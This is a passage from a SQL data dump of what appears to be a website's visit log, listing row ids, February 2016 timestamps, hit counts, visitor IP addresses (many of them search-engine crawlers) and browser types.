2,0,'68.180.229.232',''),(6866,1456203657,1,1,0,0,'66.249.81.205','other'),(6867,1456204082,1,1,0,0,'141.8.142.55','other'),(6868,1456204141,1,0,1,0,'66.249.66.158',''),(6869,1456204619,1,1,0,0,'217.69.133.4','other'),(6870,1456204761,1,1,0,0,'217.69.133.21','other'),(6871,1456204763,1,1,0,0,'217.69.133.249','other'),(6872,1456204865,1,1,0,0,'217.69.133.219','other'),(6873,1456205080,1,1,0,0,'193.194.127.217','firefox'),(6874,1456205215,1,0,1,0,'68.180.229.232',''),(6875,1456205531,1,1,0,0,'66.249.81.211','other'),(6876,1456205783,1,1,0,0,'141.8.132.97','other'),(6877,1456205965,1,1,0,0,'157.55.39.51','other'),(6878,1456206797,1,1,0,0,'207.46.13.127','other'),(6879,1456206890,1,1,0,0,'180.76.15.13','other'),(6880,1456206902,1,1,0,0,'62.210.215.100','chrome'),(6881,1456207068,1,1,0,0,'217.69.136.203','other'),(6882,1456207213,1,1,0,0,'93.158.152.26','other'),(6883,1456207818,1,0,1,0,'66.249.78.144',''),(6884,1456208140,1,1,0,0,'157.55.39.100','other'),(6885,1456208333,1,1,0,0,'51.255.65.90','other'),(6886,1456208396,1,1,0,0,'51.255.65.57','other'),(6887,1456208402,1,0,1,0,'66.249.78.158',''),(6888,1456208515,1,1,0,0,'95.133.177.111','firefox'),(6889,1456208558,1,0,1,0,'66.249.78.151',''),(6890,1456208842,1,1,0,0,'91.196.178.71','firefox'),(6891,1456209079,1,1,0,0,'91.196.178.66','chrome'),(6892,1456209276,1,1,0,0,'94.179.6.137','firefox'),(6893,1456209397,1,0,1,0,'68.180.229.232',''),(6894,1456209422,1,0,1,0,'66.249.66.158',''),(6895,1456209626,1,1,0,0,'207.46.13.127','other'),(6896,1456209946,1,1,0,0,'8.29.198.26','other'),(6897,1456210020,1,1,0,0,'217.69.143.44','other'),(6898,1456210021,1,0,1,0,'66.249.66.162',''),(6899,1456210092,1,1,0,0,'66.249.92.103','other'),(6900,1456210135,1,1,0,0,'217.69.133.252','other'),(6901,1456210226,1,1,0,0,'120.198.231.24','firefox'),(6902,1456210247,1,0,1,0,'66.249.78.144',''),(6903,1456210585,1,1,0,0,'141.8.132.97','other'),(6904,1456210586,1,1,0,0,'141.8.132.76','other'),(6905,1456210884,1,1,0,0,'217.69.133.232','other'),(6906,1456211162,1,1,0,0,'66.249.93.90','firefox'),(6907,1456211224,1,1,0,0,'91.196.178.68','chrome'),(6908,1456211681,1,1,0,0,'78.111.190.93','firefox'),(6909,1456211859,1,1,0,0,'94.179.69.140','firefox'),(6910,1456212078,1,1,0,0,'91.196.178.67','firefox'),(6911,1456212132,1,0,1,0,'68.180.229.232',''),(6912,1456212549,1,1,0,0,'91.196.178.71','firefox'),(6913,1456212595,1,1,0,0,'130.193.51.102','other'),(6914,1456212994,1,1,0,0,'91.196.178.67','chrome'),(6915,1456212995,1,1,0,0,'217.69.133.246','other'),(6916,1456212996,1,1,0,0,'37.53.71.66','chrome'),(6917,1456213281,4,4,0,0,'82.193.127.15','other'),(6918,1456213632,1,1,0,0,'157.55.39.176','other'),(6919,1456213676,1,1,0,0,'91.196.178.70','chrome'),(6920,1456213700,1,1,0,0,'217.69.133.18','other'),(6921,1456214232,1,1,0,0,'62.210.215.100','chrome'),(6922,1456214594,1,1,0,0,'85.115.62.180','other'),(6923,1456214645,1,1,0,0,'104.45.18.178','other'),(6924,1456214798,1,1,0,0,'93.73.235.217','firefox'),(6925,1456214811,1,1,0,0,'91.196.178.135','firefox'),(6926,1456215354,1,1,0,0,'217.69.133.225','other'),(6927,1456215494,1,1,0,0,'31.42.113.120','chrome'),(6928,1456216194,1,1,0,0,'157.55.39.100','other'),(6929,1456216246,2,2,0,0,'141.8.184.18','other'),(6930,1456216400,1,1,0,0,'51.255.65.90','other'),(6931,1456216513,1,1,0,0,'91.196.178.132','firefox'),(6932,1456216885,1,1,0,0,'91.196.178.67','chrome'),(6933,1456217153,1,0,1,0,'68.180.229.232',''),(6934,1456217627,1,1,0,0,'37.53.90.175','firefox'),(6935,1456217801,1,1,0,0,'217.69.133.236','other'),(6936,1456217802,1,0,1,0,'66.249.78.158',''),(6937,1456217815,1,1,0,0,'37.73.200.118','chrome'),(6938,1456218509,1,1,0,0,'217.69.133.30','other'),(6939,1456218515,1,1,0,0,'51.255.65.96','other'),(6940,1456218520,1,1,0,0,'141.8.184.18','other'),(6941,1456218521,1,1,0,0,'178.154.149.11','other'),(6942,1456219143,1,1,0,0,'66.102.9.94','chrome'),(6943,1456219183,1,1,0,0,'91.196.177.8','chrome'),(6944,1456219220,1,1,0,0,'91.196.178.71','firefox'),(6945,1456219405,1,0,1,0,'68.180.229.232',''),(6946,1456219459,1,1,0,0,'217.69.133.193','other'),(6947,1456219819,1,1,0,0,'51.255.65.47','other'),(6948,1456219826,1,1,0,0,'94.179.71.10','chrome'),(6949,1456220125,1,1,0,0,'66.249.81.208','other'),(6950,1456220252,1,1,0,0,'91.196.176.13','chrome'),(6951,1456220406,1,0,1,0,'66.249.78.158',''),(6952,1456220613,1,1,0,0,'91.196.178.162','chrome'),(6953,1456220864,1,1,0,0,'8.29.198.25','other'),(6954,1456221064,1,1,0,0,'94.179.126.228','firefox'),(6955,1456221216,1,1,0,0,'66.249.92.103','other'),(6956,1456221419,4,0,4,0,'68.180.229.232',''),(6957,1456221554,2,2,0,0,'141.8.184.18','other'),(6958,1456221557,1,1,0,0,'178.154.149.11','other'),(6959,1456222342,1,1,0,0,'217.69.133.247','other'),(6960,1456222486,1,1,0,0,'182.118.25.222','msie'),(6961,1456222513,1,1,0,0,'157.55.39.176','other'),(6962,1456222675,1,1,0,0,'217.69.133.238','other'),(6963,1456222872,1,1,0,0,'37.53.90.175','firefox'),(6964,1456223237,1,1,0,0,'91.196.178.67','firefox'),(6965,1456223413,2,2,0,0,'178.154.149.11','other'),(6966,1456223530,1,1,0,0,'66.249.81.208','other'),(6967,1456223551,1,1,0,0,'62.210.215.100','chrome'),(6968,1456223942,1,1,0,0,'141.8.184.18','other'),(6969,1456224502,1,1,0,0,'107.178.194.65','chrome'),(6971,1456224955,2,0,2,0,'68.180.229.232',''),(6972,1456224985,1,1,0,0,'178.154.189.204','other'),(6973,1456225347,2,0,2,0,'66.249.78.144',''),(6974,1456225615,1,1,0,0,'217.69.136.203','other'),(6975,1456226173,1,1,0,0,'91.196.176.13','chrome'),(6976,1456226434,1,0,1,0,'66.249.78.144',''),(6977,1456227121,1,1,0,0,'51.255.65.11','other'),(6978,1456227801,1,0,1,0,'66.249.78.158',''),(6979,1456227934,1,1,0,0,'217.69.133.231','other'),(6980,1456227943,3,3,0,0,'141.8.184.18','other'),(6981,1456227992,1,1,0,0,'217.69.133.192','other'),(6982,1456228201,1,1,0,0,'157.55.39.176','other'),(6983,1456228881,1,1,0,0,'51.255.65.61','other'),(6984,1456229347,28,28,0,0,'141.8.184.18','other'),(6985,1456229351,2,2,0,0,'178.154.149.11','other'),(6986,1456229464,1,1,0,0,'91.196.178.70','firefox'),(6987,1456229783,1,0,1,0,'66.249.66.162',''),(6988,1456229854,1,1,0,0,'157.55.39.176','other'),(6989,1456230049,1,1,0,0,'91.196.178.71','firefox'),(6990,1456230731,1,1,0,0,'66.249.81.208','other'),(6991,1456230827,1,0,1,0,'66.249.66.162',''),(6992,1456230842,1,1,0,0,'141.8.184.18','other'),(6993,1456230844,1,1,0,0,'95.132.72.192','chrome'),(6994,1456230846,1,1,0,0,'178.154.149.11','other'),(6995,1456230992,1,1,0,0,'5.255.253.110','other'),(6996,1456231148,1,1,0,0,'217.69.133.190','other'),(6997,1456231183,1,1,0,0,'94.153.229.226','chrome'),(6998,1456231208,1,1,0,0,'40.77.167.72','other'),(6999,1456231364,1,1,0,0,'77.247.181.162','chrome'),(7000,1456231451,1,1,0,0,'66.249.92.95','other'),(7001,1456231745,1,1,0,0,'8.29.198.26','other'),(7002,1456231749,1,1,0,0,'46.201.240.112','firefox'),(7003,1456231767,1,1,0,0,'217.69.133.241','other'),(7004,1456231774,2,2,0,0,'91.196.178.66','firefox'),(7005,1456231864,1,0,1,0,'66.249.78.144',''),(7006,1456231945,1,1,0,0,'91.196.178.70','firefox'),(7007,1456231952,1,1,0,0,'207.46.13.127','other'),(7008,1456232080,1,1,0,0,'157.55.39.43','other'),(7009,1456232269,2,0,2,0,'66.249.78.158',''),(7010,1456232575,1,1,0,0,'46.201.191.175','opera'),(7011,1456232698,1,0,1,0,'66.249.78.151',''),(7012,1456233241,1,1,0,0,'157.55.39.43','other'),(7013,1456233352,1,1,0,0,'91.196.178.68','firefox'),(7014,1456233554,1,1,0,0,'5.255.253.53','other'),(7015,1456233605,1,0,1,0,'68.180.229.232',''),(7016,1456234060,1,1,0,0,'51.255.65.26','other'),(7017,1456234122,1,0,1,0,'66.249.78.151',''),(7018,1456234247,1,0,1,0,'66.249.78.158',''),(7019,1456234280,1,1,0,0,'157.55.39.176','other'),(7020,1456234718,1,1,0,0,'91.196.178.65','firefox'),(7021,1456234741,1,1,0,0,'207.46.13.127','other'),(7022,1456234824,1,1,0,0,'40.77.167.72','other'),(7023,1456235032,1,0,1,0,'66.249.78.151',''),(7024,1456235087,1,1,0,0,'78.154.164.186','chrome'),(7025,1456235155,1,1,0,0,'91.196.176.13','chrome'),(7026,1456235496,1,1,0,0,'62.210.215.100','chrome'),(7027,1456235604,1,1,0,0,'5.255.253.9','other'),(7028,1456235608,1,1,0,0,'130.193.51.81','other'),(7029,1456235612,1,1,0,0,'141.8.184.22','other'),(7030,1456235616,1,1,0,0,'141.8.132.97','other'),(7031,1456235621,1,1,0,0,'5.255.253.110','other'),(7032,1456235871,1,1,0,0,'78.111.186.201','chrome'),(7033,1456235991,1,1,0,0,'40.77.167.72','other'),(7034,1456236002,1,1,0,0,'157.55.39.176','other'),(7035,1456236018,1,1,0,0,'91.196.178.168','firefox'),(7036,1456236131,1,1,0,0,'91.196.178.166','chrome'),(7037,1456236145,1,0,1,0,'66.249.78.151',''),(7038,1456236153,1,1,0,0,'130.193.51.45','other'),(7039,1456236157,1,1,0,0,'130.193.37.21','other'),(7040,1456236165,1,0,1,0,'68.180.229.232',''),(7041,1456236692,1,1,0,0,'109.237.87.222','chrome'),(7042,1456236991,1,1,0,0,'178.154.189.6','other'),(7043,1456236997,1,1,0,0,'141.8.132.109','other'),(7044,1456237002,2,2,0,0,'130.193.51.109','other'),(7045,1456237015,1,1,0,0,'130.193.51.91','other'),(7046,1456237026,1,1,0,0,'130.193.51.7','other'),(7047,1456237042,1,1,0,0,'5.255.253.51','other'),(7048,1456237049,1,1,0,0,'130.193.51.22','other'),(7049,1456237087,1,0,1,0,'66.249.78.158',''),(7050,1456237089,9,0,9,0,'68.180.229.232',''),(7051,1456237253,5,5,0,0,'51.254.143.238','other'),(7052,1456237267,1,1,0,0,'91.196.178.161','chrome'),(7053,1456237418,1,1,0,0,'51.255.65.22','other'),(7054,1456237426,1,1,0,0,'176.36.80.39','other'),(7055,1456237639,1,1,0,0,'91.196.177.15','firefox'),(7056,1456237662,1,1,0,0,'91.196.178.166','chrome'),(7057,1456237762,1,1,0,0,'78.111.190.252','chrome'),(7058,1456237934,1,1,0,0,'66.249.81.205','other'),(7059,1456238082,1,0,1,0,'68.180.229.232',''),(7060,1456238176,2,2,0,0,'5.255.253.17','other'),(7061,1456238181,1,1,0,0,'5.255.253.94','other'),(7062,1456238192,1,1,0,0,'93.158.152.9','other'),(7063,1456238196,1,1,0,0,'130.193.51.102','other'),(7064,1456238201,1,1,0,0,'5.255.253.103','other'),(7065,1456238205,1,1,0,0,'5.255.253.89','other'),(7066,1456238209,2,2,0,0,'5.255.253.53','other'),(7067,1456238669,2,2,0,0,'91.196.178.71','firefox'),(7068,1456238700,2,2,0,0,'69.171.228.123','other'),(7069,1456238758,2,2,0,0,'141.8.132.74','other'),(7070,1456238762,2,2,0,0,'130.193.51.22','other'),(7071,1456238771,2,2,0,0,'141.8.142.60','other'),(7072,1456238779,1,1,0,0,'5.255.253.51','other'),(7073,1456238788,1,1,0,0,'178.154.149.11','other'),(7074,1456238796,1,1,0,0,'66.220.158.107','other'),(7075,1456238797,1,1,0,0,'141.8.142.82','other'),(7076,1456238801,2,2,0,0,'5.255.253.62','other'),(7077,1456238805,1,1,0,0,'130.193.51.109','other'),(7078,1456238809,1,1,0,0,'178.154.189.6','other'),(7079,1456238814,1,1,0,0,'130.193.50.22','other'),(7080,1456238818,1,1,0,0,'178.154.149.9','other'),(7081,1456238826,1,1,0,0,'141.8.132.48','other'),(7082,1456238835,1,1,0,0,'141.8.132.66','other'),(7083,1456238913,1,1,0,0,'91.196.178.133','chrome'),(7084,1456239020,1,0,1,0,'66.249.78.144',''),(7085,1456239049,1,1,0,0,'46.201.214.252','firefox'),(7086,1456239125,1,1,0,0,'217.69.133.68','other'),(7087,1456239614,1,0,1,0,'68.180.229.232',''),(7088,1456239883,48,48,0,0,'136.243.103.157','other'),(7089,1456239906,1,1,0,0,'91.196.178.68','chrome'),(7090,1456239913,1,1,0,0,'217.69.133.29','other'),(7091,1456240391,1,1,0,0,'91.196.178.67','chrome'),(7092,1456240401,1,1,0,0,'207.46.13.127','other'),(7093,1456240530,1,1,0,0,'5.255.253.53','other'),(7094,1456240586,3,3,0,0,'176.36.80.39','other'),(7095,1456241549,1,1,0,0,'66.249.81.205','other'),(7096,1456242354,1,1,0,0,'66.249.92.103','other'),(7097,1456242366,2,0,2,0,'68.180.229.232',''),(7098,1456242478,1,1,0,0,'157.55.39.176','other'),(7099,1456242600,1,1,0,0,'8.29.198.26','other'),(7100,1456242754,1,1,0,0,'37.9.122.203','other'),(7101,1456243315,1,0,1,0,'66.249.78.158',''),(7102,1456243694,1,1,0,0,'217.69.143.49','other'),(7103,1456243757,116,116,0,0,'178.151.143.163','other'),(7104,1456243963,3,3,0,0,'46.118.13.110','other'),(7105,1456244352,1,1,0,0,'51.255.65.27','other'),(7106,1456245070,2,2,0,0,'141.8.184.18','other'),(7107,1456245074,2,2,0,0,'178.154.149.11','other'),(7108,1456245082,2,2,0,0,'141.8.132.2','other'),(7109,1456245087,1,1,0,0,'141.8.184.22','other'),(7110,1456245135,1,1,0,0,'93.158.152.65','other'),(7111,1456245139,1,1,0,0,'5.255.253.9','other'),(7112,1456245143,1,1,0,0,'130.193.51.43','other'),(7113,1456245147,1,1,0,0,'217.69.133.247','other'),(7114,1456245152,1,1,0,0,'141.8.184.6','other'),(7115,1456245156,1,1,0,0,'130.193.51.22','other'),(7116,1456245160,1,1,0,0,'130.193.50.31','other'),(7117,1456245239,1,1,0,0,'66.249.81.211','other'),(7118,1456245587,1,1,0,0,'40.77.167.25','other'),(7119,1456245613,1,1,0,0,'91.196.178.65','firefox'),(7120,1456245631,1,1,0,0,'95.158.49.228','chrome'),(7121,1456245659,1,1,0,0,'130.193.51.81','other'),(7122,1456245660,1,1,0,0,'5.255.253.110','other'),(7123,1456245661,1,1,0,0,'130.193.37.27','other'),(7124,1456245950,1,1,0,0,'66.102.9.104','firefox'),(7125,1456246324,3,3,0,0,'136.243.5.87','other'),(7126,1456246386,1,1,0,0,'51.255.65.18','other'),(7127,1456246541,1,1,0,0,'62.210.215.100','chrome'),(7128,1456246693,1,0,1,0,'68.180.229.232',''),(7129,1456247273,1,1,0,0,'141.8.184.11','other'),(7130,1456247274,1,1,0,0,'141.8.184.22','other'),(7131,1456247462,1,1,0,0,'141.8.132.99','other'),(7132,1456247571,1,1,0,0,'213.179.252.53','chrome'),(7133,1456247696,2,0,2,0,'68.180.229.232',''),(7134,1456248359,1,1,0,0,'51.255.65.10','other'),(7135,1456248486,2,2,0,0,'130.193.51.102','other'),(7136,1456248487,1,1,0,0,'5.255.253.55','other'),(7137,1456248488,3,3,0,0,'141.8.183.14','other'),(7138,1456248728,4,4,0,0,'130.193.51.85','other'),(7139,1456248729,4,4,0,0,'178.154.149.11','other'),(7140,1456248748,3,3,0,0,'5.255.253.10','other'),(7141,1456248749,1,1,0,0,'141.8.184.22','other'),(7142,1456248778,2,2,0,0,'141.8.142.88','other'),(7143,1456248779,1,1,0,0,'5.255.253.30','other'),(7144,1456248858,1,1,0,0,'130.193.37.27','other'),(7145,1456248862,1,1,0,0,'5.255.253.110','other'),(7146,1456248912,1,1,0,0,'141.8.132.79','other'),(7147,1456248914,1,1,0,0,'141.8.132.99','other'),(7148,1456248917,1,1,0,0,'130.193.51.81','other'),(7150,1456248920,1,1,0,0,'5.255.253.53','other'),(7152,1456248948,1,0,1,0,'66.249.78.151',''),(7153,1456249069,1,1,0,0,'92.113.156.165','firefox'),(7154,1456249373,1,1,0,0,'213.179.252.53','chrome'),(7155,1456249387,2,2,0,0,'141.8.142.82','other'),(7156,1456249389,1,1,0,0,'5.255.253.94','other'),(7157,1456249392,4,4,0,0,'141.8.132.74','other'),(7159,1456249393,1,1,0,0,'5.255.253.79','other'),(7160,1456249408,3,3,0,0,'141.8.184.31','other'),(7161,1456249431,1,1,0,0,'109.87.138.56','other'),(7162,1456249484,1,1,0,0,'5.255.253.89','other'),(7163,1456249485,1,1,0,0,'130.193.50.31','other'),(7164,1456249489,1,1,0,0,'141.8.132.44','other'),(7165,1456249579,1,1,0,0,'93.158.152.26','other'),(7166,1456249612,1,1,0,0,'130.193.51.22','other'),(7167,1456249613,2,2,0,0,'141.8.184.11','other'),(7168,1456249614,1,1,0,0,'141.8.132.109','other'),(7169,1456249615,2,2,0,0,'40.77.167.25','other'),(7170,1456249617,1,1,0,0,'141.8.132.48','other'),(7171,1456249618,1,1,0,0,'93.158.152.81','other'),(7172,1456249624,1,1,0,0,'130.193.51.7','other'),(7173,1456249690,1,1,0,0,'91.196.178.135','chrome'),(7174,1456249709,2,2,0,0,'93.158.152.65','other'),(7175,1456249710,2,2,0,0,'141.8.142.8','other'),(7176,1456249723,1,1,0,0,'5.255.253.62','other'),(7177,1456249729,1,1,0,0,'141.8.132.66','other'),(7178,1456249971,1,1,0,0,'5.255.253.100','other'),(7179,1456249973,1,1,0,0,'5.255.253.9','other'),(7180,1456249974,1,1,0,0,'141.8.132.99','other'),(7182,1456249976,1,1,0,0,'178.154.189.6','other'),(7183,1456249977,1,1,0,0,'141.8.142.55','other'),(7184,1456250231,1,1,0,0,'130.193.51.81','other'),(7185,1456250278,2,0,2,0,'68.180.229.232',''),(7186,1456250298,75,75,0,0,'207.46.13.127','other'),(7187,1456250446,76,76,0,0,'157.55.39.176','other'),(7188,1456250536,1,1,0,0,'51.255.65.81','other'),(7189,1456251488,1,1,0,0,'217.69.133.215','other'),(7190,1456251628,1,1,0,0,'213.179.252.53','chrome'),(7191,1456251736,1,0,1,0,'66.249.78.158',''),(7192,1456252412,1,1,0,0,'46.219.33.158','chrome'),(7193,1456252469,1,1,0,0,'217.69.133.31','other'),(7194,1456252504,1,1,0,0,'141.0.12.138','chrome'),(7195,1456252625,1,1,0,0,'5.255.253.30','other'),(7196,1456252782,5,5,0,0,'176.36.80.39','other'),(7197,1456253136,1,1,0,0,'213.179.252.53','chrome'),(7198,1456253207,2,2,0,0,'136.243.103.156','other'),(7199,1456253433,1,1,0,0,'8.29.198.25','other'),(7200,1456253661,1,1,0,0,'66.249.92.99','other'),(7201,1456254617,140,140,0,0,'77.248.252.113','other'),(7202,1456254790,1,1,0,0,'5.255.253.100','other'),(7203,1456254794,1,1,0,0,'5.255.253.10','other'),(7204,1456254799,1,1,0,0,'5.255.253.9','other'),(7205,1456254803,1,1,0,0,'141.8.184.22','other'),(7206,1456254807,1,1,0,0,'130.193.51.102','other'),(7207,1456255391,1,1,0,0,'94.179.46.223','firefox'),(7208,1456255448,1,1,0,0,'217.69.133.13','other'),(7209,1456255518,29,29,0,0,'77.248.252.113','other'),(7210,1456255669,1,1,0,0,'141.8.142.8','other'),(7211,1456255670,1,1,0,0,'141.8.184.18','other'),(7212,1456255876,2,2,0,0,'46.165.197.141','other'),(7213,1456255959,1,1,0,0,'66.249.81.208','other'),(7214,1456256172,1,1,0,0,'94.179.111.27','firefox'),(7215,1456256655,1,1,0,0,'207.46.13.127','other'),(7216,1456256764,2,2,0,0,'95.213.141.126','opera'),(7217,1456256812,1,1,0,0,'217.69.133.72','other'),(7218,1456256826,7,7,0,0,'40.77.167.72','other'),(7219,1456256955,1,1,0,0,'45.32.129.1','chrome'),(7220,1456257653,1,1,0,0,'157.55.39.176','other'),(7221,1456258269,1,1,0,0,'5.255.253.10','other'),(7222,1456258387,1,1,0,0,'62.210.215.100','chrome'),(7223,1456258600,1,1,0,0,'93.158.152.65','other'),(7224,1456258601,1,1,0,0,'141.8.184.18','other'),(7225,1456258602,1,1,0,0,'5.255.253.53','other'),(7226,1456258641,1,1,0,0,'40.77.167.25','other'),(7227,1456259646,1,1,0,0,'217.69.133.243','other'),(7228,1456259678,1,1,0,0,'66.249.81.211','other'),(7229,1456259961,1,1,0,0,'51.255.65.47','other'),(7230,1456260122,1,1,0,0,'46.160.74.227','chrome'),(7231,1456260775,1,1,0,0,'180.76.15.150','other'),(7232,1456261143,1,1,0,0,'217.69.133.9','other'),(7233,1456261417,1,1,0,0,'157.55.39.201','other'),(7234,1456261550,1,0,1,0,'66.249.78.144',''),(7235,1456262003,3,3,0,0,'176.36.80.39','other'),(7236,1456262302,1,1,0,0,'141.8.184.31','other'),(7237,1456262644,44,44,0,0,'82.193.127.15','other'),(7238,1456263195,1,1,0,0,'66.249.81.205','other'),(7239,1456263648,1,1,0,0,'157.55.39.176','other'),(7240,1456263783,1,1,0,0,'217.69.133.227','other'),(7241,1456264088,1,1,0,0,'66.249.92.103','other'),(7242,1456264251,1,1,0,0,'8.29.198.26','other'),(7243,1456264556,1,1,0,0,'51.255.65.4','other'),(7244,1456264561,1,0,1,0,'68.180.229.232',''),(7245,1456264611,1,1,0,0,'5.255.253.100','other'),(7246,1456264701,1,0,1,0,'66.249.78.151',''),(7247,1456264854,1,0,1,0,'66.249.78.158',''),(7248,1456265068,68,68,0,0,'40.77.167.25','other'),(7249,1456265267,3,3,0,0,'5.255.253.62','other'),(7250,1456265293,1,1,0,0,'141.8.132.99','other'),(7251,1456265302,1,1,0,0,'130.193.37.21','other'),(7252,1456265306,2,2,0,0,'141.8.132.109','other'),(7253,1456265310,2,2,0,0,'130.193.51.102','other'),(7254,1456265314,1,1,0,0,'141.8.132.74','other'),(7255,1456265318,1,1,0,0,'5.255.253.30','other'),(7256,1456265661,1,1,0,0,'5.255.253.9','other'),(7257,1456265669,1,1,0,0,'93.158.152.65','other'),(7258,1456265673,1,1,0,0,'141.8.132.97','other'),(7259,1456265682,1,1,0,0,'5.255.253.17','other'),(7260,1456265689,1,1,0,0,'141.8.184.31','other'),(7261,1456265694,1,1,0,0,'93.158.152.9','other'),(7262,1456265801,2,2,0,0,'157.55.39.201','other'),(7263,1456266154,8,8,0,0,'176.36.80.39','other'),(7264,1456266691,1,0,1,0,'66.249.78.144',''),(7265,1456266820,1,1,0,0,'66.249.81.205','other'),(7266,1456267685,1,1,0,0,'217.69.133.191','other'),(7267,1456267883,1,1,0,0,'62.210.215.100','chrome'),(7268,1456268007,1,1,0,0,'180.76.15.10','other'),(7269,1456268562,1,1,0,0,'217.69.136.207','other'),(7270,1456268641,1,1,0,0,'157.55.39.176','other'),(7271,1456269331,1,1,0,0,'217.69.133.246','other'),(7272,1456269534,1,1,0,0,'180.76.15.31','other'),(7273,1456269747,1,1,0,0,'5.255.253.30','other'),(7274,1456269751,1,1,0,0,'5.255.253.110','other'),(7275,1456269755,1,1,0,0,'130.193.51.102','other'),(7276,1456269759,1,1,0,0,'130.193.37.21','other'),(7277,1456270268,1,1,0,0,'157.55.39.176','other'),(7278,1456270472,1,1,0,0,'66.249.81.205','other'),(7279,1456270957,1,1,0,0,'207.46.13.127','other'),(7280,1456271055,1,1,0,0,'5.255.253.51','other'),(7281,1456271272,1,1,0,0,'217.69.133.15','other'),(7282,1456271408,1,1,0,0,'188.231.228.136','chrome'),(7283,1456271780,1,0,1,0,'66.249.78.158',''),(7284,1456272046,1,1,0,0,'157.55.39.176','other'),(7285,1456274063,1,0,1,0,'68.180.229.232',''),(7286,1456274980,1,0,1,0,'66.249.78.144',''),(7287,1456275071,1,1,0,0,'66.249.92.95','other'),(7288,1456275105,1,1,0,0,'8.29.198.26','other'),(7289,1456276039,1,0,1,0,'66.249.78.144',''),(7290,1456277510,1,1,0,0,'157.55.39.243','other'),(7291,1456278236,2,2,0,0,'141.8.184.18','other'),(7292,1456278663,1,1,0,0,'51.255.65.63','other'),(7293,1456278822,1,1,0,0,'62.210.215.100','chrome'),(7294,1456278909,1,0,1,0,'66.249.78.144',''),(7295,1456279131,1,1,0,0,'217.69.133.239','other'),(7296,1456280013,1,1,0,0,'51.255.65.75','other'),(7297,1456280058,7,7,0,0,'141.8.184.18','other'),(7298,1456280062,7,7,0,0,'93.158.152.9','other'),(7299,1456280071,7,7,0,0,'141.8.183.14','other'),(7300,1456280078,1,0,1,0,'68.180.229.232',''),(7301,1456280092,6,6,0,0,'178.154.149.11','other'),(7302,1456280095,2,2,0,0,'130.193.37.21','other'),(7303,1456280108,1,1,0,0,'141.8.132.99','other'),(7304,1456280129,1,1,0,0,'5.255.253.53','other'),(7305,1456280650,1,1,0,0,'217.69.136.209','other'),(7306,1456280931,1,1,0,0,'51.255.65.53','other'),(7307,1456281767,1,0,1,0,'66.249.78.144',''),(7308,1456282709,1,1,0,0,'141.8.184.18','other'),(7309,1456283121,1,1,0,0,'217.69.133.29','other'),(7310,1456283225,1,0,1,0,'68.180.229.232',''),(7311,1456283736,9,9,0,0,'178.154.149.11','other'),(7312,1456283744,5,5,0,0,'141.8.184.18','other'),(7313,1456283750,1,1,0,0,'157.55.39.185','other'),(7314,1456283789,1,1,0,0,'141.8.183.14','other'),(7315,1456284137,1,1,0,0,'217.69.133.85','other'),(7316,1456284138,1,1,0,0,'217.69.133.215','other'),(7317,1456284182,1,1,0,0,'217.69.133.21','other'),(7318,1456284466,1,1,0,0,'217.69.133.5','other'),(7319,1456284577,1,0,1,0,'68.180.229.232',''),(7320,1456284624,1,0,1,0,'66.249.78.151',''),(7321,1456285151,1,1,0,0,'157.55.39.176','other'),(7322,1456285525,1,0,1,0,'66.249.66.166',''),(7323,1456285556,1,1,0,0,'51.255.65.22','other'),(7324,1456285913,1,1,0,0,'8.29.198.25','other'),(7325,1456285953,1,0,1,0,'68.180.229.232',''),(7326,1456286085,15,15,0,0,'141.8.184.18','other'),(7327,1456286089,5,5,0,0,'141.8.183.14','other'),(7328,1456286094,8,8,0,0,'93.158.152.9','other'),(7329,1456286099,13,13,0,0,'178.154.149.11','other'),(7330,1456286127,3,3,0,0,'5.255.253.53','other'),(7331,1456286464,1,1,0,0,'66.249.92.103','other'),(7332,1456287169,1,1,0,0,'51.255.65.62','other'),(7333,1456287335,1,1,0,0,'217.69.133.218','other'),(7334,1456288208,1,1,0,0,'207.46.13.91','other'),(7335,1456288565,1,1,0,0,'217.69.143.46','other'),(7336,1456288694,1,1,0,0,'178.154.189.204','other'),(7337,1456289085,2,2,0,0,'207.46.13.127','other'),(7338,1456289302,1,1,0,0,'217.69.133.233','other'),(7339,1456289452,1,0,1,0,'66.249.78.158',''),(7340,1456289612,1,1,0,0,'93.158.152.9','other'),(7341,1456289616,1,1,0,0,'130.193.51.45','other'),(7342,1456289620,1,1,0,0,'5.255.253.10','other'),(7343,1456289624,1,1,0,0,'141.8.142.10','other'),(7344,1456289628,1,1,0,0,'130.193.51.81','other'),(7345,1456289632,2,2,0,0,'130.193.51.102','other'),(7346,1456289635,1,1,0,0,'207.46.13.174','other'),(7347,1456289636,1,1,0,0,'5.255.253.55','other'),(7348,1456289641,1,1,0,0,'130.193.37.27','other'),(7349,1456289645,1,1,0,0,'130.193.51.85','other'),(7350,1456289650,2,2,0,0,'141.8.183.14','other'),(7351,1456289653,2,2,0,0,'130.193.37.21','other'),(7352,1456289657,1,1,0,0,'141.8.132.99','other'),(7353,1456289661,1,1,0,0,'130.193.51.43','other'),(7354,1456289665,1,1,0,0,'93.158.152.26','other'),(7355,1456289669,2,2,0,0,'141.8.132.76','other'),(7356,1456290249,1,0,1,0,'66.249.78.151',''),(7357,1456290563,1,1,0,0,'93.158.152.9','other'),(7358,1456290564,1,1,0,0,'130.193.37.21','other'),(7359,1456290565,1,1,0,0,'130.193.51.85','other'),(7360,1456290567,1,1,0,0,'130.193.51.45','other'),(7361,1456291450,1,1,0,0,'62.210.215.100','chrome'),(7362,1456291579,1,0,1,0,'66.249.78.151',''),(7363,1456291982,1,1,0,0,'217.69.133.203','other'),(7364,1456292016,1,1,0,0,'5.255.253.100','other'),(7366,1456292553,1,1,0,0,'130.193.51.102','other'),(7367,1456292554,1,1,0,0,'141.8.142.88','other'),(7369,1456292845,1,1,0,0,'180.76.15.23','other'),(7370,1456292888,1,1,0,0,'180.76.15.137','other'),(7371,1456293237,1,1,0,0,'217.69.133.216','other'),(7372,1456293239,1,1,0,0,'66.102.9.84','firefox'),(7373,1456294066,1,1,0,0,'217.69.133.231','other'),(7374,1456294875,1,1,0,0,'66.249.78.151','other'),(7375,1456295171,1,0,1,0,'66.249.66.166',''),(7376,1456295326,1,0,1,0,'66.249.78.158',''),(7377,1456295543,1,0,1,0,'68.180.229.232',''),(7378,1456295654,1,1,0,0,'91.196.178.72','chrome'),(7379,1456295755,1,1,0,0,'82.145.220.169','chrome'),(7380,1456296037,2,2,0,0,'141.8.142.82','other'),(7381,1456296038,3,3,0,0,'130.193.51.50','other'),(7382,1456296204,1,1,0,0,'5.255.253.17','other'),(7384,1456296205,2,2,0,0,'93.158.152.81','other'),(7385,1456296206,1,1,0,0,'130.193.37.21','other'),(7387,1456296207,2,2,0,0,'141.8.142.41','o